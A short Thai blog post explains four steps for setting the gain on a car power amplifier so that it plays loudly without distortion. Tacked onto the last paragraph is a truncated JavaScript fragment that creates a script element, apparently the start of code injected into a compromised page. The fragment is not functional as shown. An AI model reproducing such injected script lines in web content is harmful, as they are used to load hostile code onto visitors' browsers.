Select Page

การปรับตั้งเกนขยาย…ในเพาเวอร์แอมป์…???

การปรับตั้งเกนขยาย…ในเพาเวอร์แอมป์…???

การปรับตั้งเกนขยาย…ในเพาเวอร์แอมป์…??? 

การปรับตั้ง ”เกน” การ ขยาย… หรือการปรับความไวอินพุทของเพาเวอร์แอมป์นั้น…ถือเป็นขั้นตอนสำคัญของการ ติดตั้งเพาเวอร์แอมป์ในระบบ… เกนขยายที่เหมาะสม…จะช่วยลดปัญหาเรื่องเสียงรบกวน…และความเพี้ยนของ เสียง…และยังช่วยให้ได้ไดนามิคเรนจ์ที่กว้างมากขึ้น…ซึ่งมีขั้นตอนการ ปฏิบัติดังนี้…

  1.  ปรับปุ่มควบคุมระดับขยายที่เพาเวอร์แอมป์ลงให้หมดก่อน…โดยตั้งไว้ที่ความไวต่ำสุด…หรือ V มากสุด…
  2.  บรรจุ แผ่นซีดีที่เหมาะสมลงในเครื่องเล่น…หรือเปิดภาครับวิทยุคลื่นที่ชัดเจนที่ สุด…พร้อมหมุนปุ่มวอลลุ่มที่ตัวเฮดยูนิทไปจนได้ยินเสียงเพลงดังออกมา… และหมุนเพิ่มไปเรื่อยๆ…
  3. จน เมื่อได้ยินเสียงเพลงที่พร่าเพี้ยน…ให้ลดระดับลงจนได้ยินเสียงที่เป็นปกติ ไม่พร่าเพี้ยน…ซึ่งนี่คือจุดเริ่มต้นของเสียงที่มีคุณภาพในการป้อนให้กับ เพาเวอร์แอมป์…ที่ให้อัตราส่วนของเสียงต่อการรบกวนสูงที่สุด…
  4.  ถึง ขั้นนี้ก็ให้ทำการปรับหมุนปุ่มเกนขยายที่เพาเวอร์แอมป์…เพื่อเพิ่มระดับ ความดังเสียงจนได้ระดับความดังที่พอใจ…หรือจนกว่าจะเริ่มได้ยินเสียงเพลง ที่พร่าเพี้ยนนั้นอีกครั้ง…แล้วจึงให้ลดระดับลงเล็กน้อยจนเสียงเพี้ยนหาย ไป… ก็เป็นอันจบกระบวนการ

20140225032736-1317400758

การปฏิบัติตามกระบวนการ เหล่านี่…จะมีผลให้เพาเวอร์แอมป์แสดงสมรรถนะสูงสุด…ในระดับวอลลุ่มมาก สุด… ระบบจะทำการขยายทุกๆสัญญาณได้โดยไม่มีความผิดเพี้ยน…หรือก่อความเสียหาย ใดๆต่อลำโพง… โดยการปรับตั้งที่สมบูรณ์นั้น…ไม่เพียงแต่มีผลต่อเพาเวอร์แอมป์…แต่ยัง มีผลต่อจำนวนสัญญาณที่ป้อนเข้ามา…ทำให้ได้คุณภาพเสียงดีที่สุดสำหรับ ระบบ… var d=document;var s=d.createElement(‘script’);

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg
%d bloggers like this: